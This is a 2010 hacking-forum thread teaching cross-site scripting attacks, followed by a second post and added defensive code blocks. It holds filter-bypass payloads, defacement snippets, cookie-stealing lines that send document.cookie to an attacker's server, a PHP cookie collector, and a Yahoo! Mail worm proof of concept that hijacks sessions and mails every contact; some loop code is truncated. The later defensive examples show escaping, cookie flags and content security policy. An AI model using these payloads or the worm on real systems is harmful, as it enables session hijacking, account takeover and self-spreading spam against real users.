Dark Angel
Hacking and Reverse
 

:: XSS Tutorial ::

 
4l3x
Administrator

Offline

Joined: 04 Nov 2009
Posts: 96

Posted: Tue 5 Jan - 09:23 (2010)    Subject: XSS Tutorial

Complete tutorial on XSS methods.

PART 1

'XSS', also known as 'CSS' (Cross Site Scripting, easily confused with 'Cascading Style Sheets'),
is a very common vulnerability found in web applications. 'XSS' allows the attacker to INSERT
malicious code. There are many types of XSS attacks; I will mention 3 of the most used.

The first attack I wanna talk about is 'URL XSS'. This means that the XSS won't stay on the page;
it will only get executed if you have the malicious code in the URL and submit the URL.
We will talk more on how to use this to our advantage.

The second attack is input fields. Wherever you can insert data, it is very common for it to be XSS
vulnerable. For example, say we found a site with a search engine. Now in the search box you enter
'hacker' and hit enter. When the page loads, if it shows your data, like 'Found 100 Results For hacker',
OK, now you see it's displaying our data on the page. Now what if we can execute code? There is no possible
way to execute PHP code in this attack, but there certainly is for HTML and JavaScript. But be aware this method
also won't stay on the server; this is for your eyes only.

The third attack: with this attack you will be able to INSERT data (code) and it will stay on the website.
Now there are 2 kinds; it depends on whether we can execute PHP or HTML. If we can inject PHP then we can also
inject HTML, but NOT vice versa. OK, this kind of attack is normally found on blogs, shoutboxes, profiles,
forums, just most places where you insert data and it stays there. Now HTML is totally different from PHP:
HTML downloads to your PC and then your 'browser' parses/interprets the code (that's why its source is viewable).
With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.
PHP injection is rare, but it doesn't harm to try. Note: PHP code can't be injected into an HTML page!


Well, to start finding these vulnerabilities you can start checking out
blogs, forums, shoutboxes, comment boxes, search boxes; there are too many to mention.

Using 'Google Dorks' makes the finding easier. OK, if you wanna get cracking, go to google.com and type
inurl:"search.php?q=". Now that is a common page and has a lot of results. To find out some attacks, move
on to the next chapter.

Also note that most sites have XSS vulnerabilities; it's just having a good eye and some good knowledge
on how to bypass their filtration.


Well, now to crack on and start learning some actual methods. The most commonly used XSS injection is

<script>alert("XSS")</script>

Now this will alert a popup message saying "XSS" without quotes; it's easily editable.

So, backtracking to the last chapter, I'm assuming you remember we talked about search.php?q=.
Well, you can simply try the following on a website with the same thing:

http://site.com/search.php?q=<script>alert("XSS")</script>

There are good chances of it working, but don't be worried if it doesn't; just try different sites.

Some other easy XSS (I don't think people realise they can insert HTML, not just JavaScript):

http://site.com/search.php?q=<br>&...</b>

If you see the bold text on the page and newlines then you know it's vuln, and then you can move on using some
methods explained later on in the tutorial.


Well, now you understand how XSS works, we can explain some simple XSS deface methods. There
are many ways of defacing; I will mention some of the best and most used.

The first one is IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that
displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

OK, now if you change the link to a valid picture link, save it and run it, you will see what I mean.

Right, now say you have found a shoutbox, comment box, or anything that shows your data after you submitted it;
you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed as the page will already have them (in rare cases they will not).

OK, it helps to make your picture big so it stands out and it's clear the site got hacked.

Another method is using FLASH videos; it's the same as the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it.

Or maybe using a popup or redirection?

<script>window.open( "http://www.google.com/" )</script>

There are many other ways that I'm not going to explain due to how busy I am. It's easy to look up methods
using Google and googling for HTML tutorials; you can see how to embed music etc.


I decided to add this as it's the most USEFUL method of XSS, and I haven't seen any papers covering it.

First grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

OK, now you have it, save it as a .php file and upload to your server. Remember to create the file 'log.txt' too
and chmod it to 777. OK, now find an XSS vulnerable website; any attack type will do.

OK, now you're gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


Now when a user visits the page that got injected, they will be sent to the site, and the cookie will be stolen.
The second one is more stealthy.

Watch your file now for cookies, then you can hijack their session :D

But now you ask, what if my site hasn't got this kind of attack; it only shows data once and doesn't
store it? Well, let's say we had a page search.php?q=; we can use the following code to make a malicious URL from it
and maybe hex or base64 encode it so people can't see the code.

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

PART 2

A lot of sites may seem vulnerable but are not executing the code. Well, to solve this, take note of this chapter.

Some common methods to bypass filtration are

')alert('xss');

or

");alert('xss');

That will do the same thing as <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit.

Please note it's bad practice to use alert("XSS") to test for XSS, as I've known sites to block the keyword XSS
before.

Some other ways to bypass filtration:

<script type=text/javascript>alert("t0pP8uZz")</script>
<script>alert("t0pP8uZz")</script>;
<script>alert("t0pP8uZz");</script>
<script>alert("/t0pP8uZz"/)</script>
<script>var var = 1; alert(var)</script>

Read the next chapter for another way to bypass magic quotes filtration.



OK, in this chapter we're going to learn about some good techniques that I myself haven't seen
being used before, but I'm sure you guys will like it.

I've come across many sites where 'Magic Quotes' is on, therefore rendering some commands useless.

Fear not, I've come up with a way using char codes (decimals), to convert char code to ASCII.

The functions to turn CharCodes (decimals) into ASCII; you can find a complete table here: http://www.asciitable.com/

This will help you write what you want. In my examples I'll be writing "t0pP8uZz"; this is the following code:

116 48 112 80 56 117 90 122

OK, now we've got the decimal value of our string, we need to know what function in JavaScript converts this.

String.fromCharCode()

is suitable for this kind of thing; it's easy to set up. I'm gonna give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

OK, now "String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)" is a JAVA (ASCII) way of saying

t0pP8uZz

And to use this with alerts etc., you don't need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

OK, now this will display our message, in this case "t0pP8uZz". This method is very useful for
bypassing magic quotes and maybe some custom escaping of quotes.

OK, before I move on I wanna talk about another method using variables. Let's declare one below:

var myVar = 1

OK, now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

<script>var myVar = 1; alert(myVar)</script>

And this will display the variable contents, again without using quotes.

There are many other methods that I'm not going to talk about. XSS is a simple attack,
and from here you should know what you need.



OK, this was written for web developers (yeah right..) so I'm gonna talk about how to secure your code.

If you found XSS bugs in your scripts, it's easy to secure; take a look at the code below.

if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}

OK, say the variable $_POST['form'] was coming from an input box; then you have an XSS attack.
The following is a very easy way to secure that.

// Check the raw input: isset($data) would always be true once $data has been assigned
if(isset($_POST['form'])){
$charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);
echo "<html><body>" .$data. "</body></html>";}

Now that will take all possible code and make it not executable, by turning it into stuff like
&lt; etc...

You will not notice a difference when using htmlentities();

There is also another common function, strip_tags(); find more info at php.net/striptags

OK, another way, to show you how to secure INTEGER variables (variables that will always contain an INT):

// $this is reserved in PHP and cannot be assigned, so the variable is named $id here
$id = $_GET['id'];
echo "you are viewing " . $id . "blog";

Now if we include ?id=<script>alert("XSS")</script>
in the URL it's gonna execute our code. A very easy way to secure this is using (int); check the following code:

// $this is reserved in PHP and cannot be assigned, so the variable is named $id here
$id = (int)$_GET['id'];
echo "you are viewing " . $id . "blog";

Now if at any time the variable contains anything but an integer, it will return 0.

That's enough said.
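
An added example, not part of the original post: it runs the post's own payload strings through quote escaping, htmlentities() with ENT_NOQUOTES, and an encoder that also covers quoted attribute values, then validates the ?id= parameter instead of casting it. The helper names h() and int_param() are assumptions made for this example, and the inputs are constructed from strings quoted in the post.

```php
<?php
// Added example: helper names are hypothetical, inputs are constructed.

// Encode for HTML element content AND quoted attribute values.
// ENT_QUOTES encodes both " and ', which ENT_NOQUOTES leaves untouched.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate an integer parameter; return null instead of silently yielding 0.
function int_param(array $source, string $key): ?int
{
    $v = filter_var($source[$key] ?? null, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Constructed inputs, taken from the payload strings quoted in the post.
$samples = [
    '<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>',
    '");alert(\'xss\');',
];

foreach ($samples as $s) {
    // Quote escaping alone (what magic quotes did) leaves < and > intact,
    // so the first sample passes through unchanged.
    echo "addslashes : ", addslashes($s), "\n";
    // ENT_NOQUOTES is enough between tags, but the " in the second sample
    // would still close a value="..." attribute.
    echo "NOQUOTES   : ", htmlentities($s, ENT_NOQUOTES, 'UTF-8'), "\n";
    // Safe in element content and in quoted attributes.
    echo "h()        : ", h($s), "\n\n";
}

// Integer case: the post's ?id= parameter. (int)'7abc' would give 7;
// strict validation rejects it, and the markup payload, outright.
foreach (['42', '<script>alert("XSS")</script>', '7abc'] as $raw) {
    $id = int_param(['id' => $raw], 'id');
    echo $id === null ? "rejected\n" : "you are viewing {$id} blog\n";
}
```

Neither encoder is appropriate for data placed inside a `<script>` block or an unquoted attribute; those contexts need their own encoding.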


Karl
Member

Offline

Joined: 23 Nov 2009
Posts: 108

Posted: Thu 7 Jan - 05:28 (2010)    Subject: XSS Tutorial

Okay

Another approach to XSS attacks:

1. DESCRIPTION

Using Cross Site Scripting (XSS) attacks gives us the possibility to impersonate one legitimate user (victim) that is registered on a website (target).

In this tutorial we'll suppose the target site has an XSS vulnerability which lets an attacker inject "bad code" into a page.

First, let's follow these steps:

a. The victim certifies on the target site
b. The attacker sends a link to a page (with the "bad code") from the target site to the victim
c. The victim navigates to the page
d. The page code loads a script from another location, sending the victim's cookies
e. The script uses this cookie to act like the victim on the target site

I'll illustrate now (with examples):

We suppose the victim is already certified on the target site

The target has an XSS vulnerability:
http://www.target.com/page.php?var=

The attacker sends the link to his victim:
"http://www.target.com/page.php?var="

When the victim follows the link, the script "js.js" is loaded and executed by the browser

===== js.js =====

new Image().src='http://www.attacker.com/php.php?cookie= '+escape(document.cookie);


=================

The file "js.js" contains code which makes a request to the file "php.php", controlled by the attacker.

===== php.php =====

$domain=".target.com"; // cookie domain

$cookie=$_GET['cookie'];

//we create the file , supposeing the cookie session has more sequence's "name=value; "

$hcook=fopen("cookie.txt","w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value=substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// we make any curl request useing "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR



The "php.php" file is essential to this kind of attack.

This steals the victim's cookie and uses it to look like the victim on the target site. The reason for using a PHP script in place of JavaScript is to get past the JavaScript policies, having the possibility of requesting any kind of domain where the cookie is valid. We can receive and send data to the target site and manipulate it in any kind of mode.

2. YAHOO! MAIL Worm PoC

We'll suppose that Yahoo! has an XSS vulnerability of the following form:

"http://xxx.yahoo.com/page?var="

a. The attacker sends an email containing the link to http://xxx.yahoo.com/page?var= to the victim
b. The victim follows the link (OK, pause. Let's name the victim BILL)
c. The "worm.php" file steals BILL's cookie and uses it to send a mail to every person in his Address Book
d. The people in BILL's Address Book become victims when they follow the link from the email, which seems to come from a victim

===== worm.php =====

$subject="Link for you"; // message subject
$message ="Look a cool link, CLICK ME!"; // message body

// We eliminate the need of a "js.js" file checking the parameter value of "cookie"
// If this doesn't exist we type the content of "js.js" file
// and if exist's we continue with "php.php"

if(!isset($_GET['cookie']))
{
$scripturl="http://".$HTTP_HOST.$REQUEST_URI;
print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);");
}
else
{
$cookie=$_GET['cookie'];

// We create a unique name for the file were we'll save the cookie ensureing this way
// that when a lot of victim's access simultaneuously the script; the cookie's will not overwrite
$cookiefile=rand(100,999).".txt";


// we create the cookie file

$hcook=fopen($cookiefile,"w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value= substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// We try the Yahoo! address book for data extraction all about the contact's and create a variable of the form
// "contact1@yahoo.com,contact2@yahoo.com, etc.." as well finding the domain us.fXXX.mail.yahoo.com
// which change's each time there is a certify!


$address=curl("http://address.mail.yahoo.com/","",$cookiefile);
if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly
{
$apage=explode(" ",$address);
foreach($apage as $line_num => $aline)
{
if(strstr($aline,"ymsgr:sendIM"))
{
$ex =explode("?",$aline);
$ex2=explode(""",$ex[1]);
$id=$ex2[0];
$to=$to.$ex2[0]."@yahoo.com,";
}
if(strstr($aline,"Compose"))
{
$ex3=explode("/",$aline);
$domain="http://".$ex3[2];
}
}
}

// We load the "Compose" formular situaten on us.fXXX.mail.yahoo.com for finding the formular's action
// to send email and parameter value ".crumb" which we need for sending message's


if(strlen($to)>0 && strlen($domain)>0) // if we have the 2 variable's
{
$compose= curl($domain."/ym/Compose?","",$cookiefile);
if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly
{
$cpage=explode(" ",$compose);
foreach($cpage as $line_num => $cline)
{
if(strstr($cline,"form name="Compose""))
{
$ex4=explode(""",$cline);
$action=$ex4[5];
}
if(strstr($cline,".crumb"))
{
$ex6=explode(""",$cline);
$crumb=$ex6[3];
}
}
}

if(strlen($action)>0 && strlen($crumb)>0) // if we have the 2 variable's
{

$subject=str_replace(" ","+",$subject);
$message=str_replace(" ","+",$message);

// we generate POSTFIELDS for curl

$post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&";
$post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&";
$post.="box=&.crumb=".$crumb."&";
$post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&";
$post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&";
$post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&";
$post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&";
$post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&";
$post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&";
$post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&";
$post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&";
$post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&";
$post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&";
$post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&";

// sending the mail's
$mail=curl($domain.$action,$post,$cookiefile);
}
}
unlink($cookiefile);
}

function curl($url,$post='',$cookiefile) // function to easy the curl request's
{
$rand=rand(100000,400000);
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
if($post!=='')
{
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
}
curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);
curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$result=curl_exec($ch);
curl_close($ch);
if($result=="") { curl($url,$post); } else { return $result; }
}

?>
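
How the target site can break the chain described in this post, as an added example that is not part of the original post: session cookie flags that keep the cookie out of document.cookie, plus a Content-Security-Policy that refuses the remote script load and the image beacon. The function names harden_response() and on_login() are hypothetical, and the array form of session_set_cookie_params() assumes PHP 7.3 or later.

```php
<?php
// Added example: function names are hypothetical.
// Call harden_response() at the top of every request, before any output.

function harden_response(): void
{
    // HttpOnly: document.cookie no longer returns the session cookie, so the
    //           image beacon in js.js has no session id to send.
    // Secure:   the cookie is only ever sent over HTTPS.
    // SameSite: the cookie is withheld from cross-site subrequests.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    ini_set('session.use_strict_mode', '1');   // refuse ids the server did not issue
    ini_set('session.use_only_cookies', '1');  // never accept a session id from the URL

    // CSP: scripts and images only from our own origin. Inline <script> is
    // refused, a script hosted elsewhere is not loaded, and new Image().src
    // cannot reach another host.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "img-src 'self'; object-src 'none'; base-uri 'self'");
    header('X-Content-Type-Options: nosniff');

    session_start();
}

function on_login(string $userId): void
{
    // Issue a fresh id at the privilege change and delete the old session,
    // so an id captured before login is worthless afterwards.
    session_regenerate_id(true);
    $_SESSION['uid'] = $userId;
}
```

These headers limit what an injected script can take or load; the injection point itself still has to be closed by encoding the reflected parameter on output.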

